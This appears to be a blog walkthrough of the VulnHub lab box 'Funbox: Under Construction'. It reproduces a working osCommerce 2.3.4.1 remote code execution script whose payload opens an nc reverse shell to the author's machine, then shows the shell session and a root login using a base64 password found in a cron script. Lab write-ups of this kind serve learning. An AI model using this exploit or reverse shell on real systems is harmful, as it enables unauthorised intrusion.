This will also be brief. It’s FUNBOX: UNDER CONSTRUCTION! from VulnHub:

As always, it’s a very easy box for beginners.

Ports

This one has SSH, HTTP and various mail ports - for SMTP, POP3 and IMAP. We’re interested in the web stuff.

HTTP

At http://192.168.1.78/catalog/ we find osCommerce Online Merchant v2.3.4.1 which has various exploits. We can grab an unauthenticated RCE exploit from searchsploit and edit it:

# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
# Date: 29.0.3.2018
# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows

# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply executing the code by opening it.


import requests

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://192.168.1.78//catalog/"
target_url = "http://192.168.1.78/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*

payload = '\');'
payload += 'system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.210 1234 >/tmp/f");'    # this is where you enter you PHP payload
payload += '/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")

Note the above has been modified for the correct URLs and it sends me a reverse shell, like so:

┌──(root💀kali)-[/opt/vulnhub/funbox10]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.78] 33868
/bin/sh: 0: cant access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@funbox10:/var/www/html/catalog/install/includes$

Privesc

I’m going to explain this slightly backwards. There is a cronjob running as the user Joe:

root@funbox10:/var/spool/cron/crontabs# cat joe
cat joe
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.wWLDXL/crontab installed on Mon Jul 19 13:24:20 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/1 * * * * /usr/share/doc/examples/cron.sh

Which is calling a shell script we can read:

www-data@funbox10:/$ cat /usr/share/doc/examples/cron.sh
cat /usr/share/doc/examples/cron.sh
# cron.sh sample file
# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==

And that file contains the root password base64 encoded:

www-data@funbox10:/$ echo LXUgcm9vdCAtcCByZnZiZ3QhIQ== | base64 -d
echo LXUgcm9vdCAtcCByZnZiZ3QhIQ== | base64 -d
-u root -p rfvbgt!!www-data@funbox10:/$ su root
su root
Password: rfvbgt!!

root@funbox10:/# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
funbox10
Sun Aug  1 12:14:04 CEST 2021

How did we know this? Pspy can find it, although it seems a bit flaky. Anyhoo, we move on….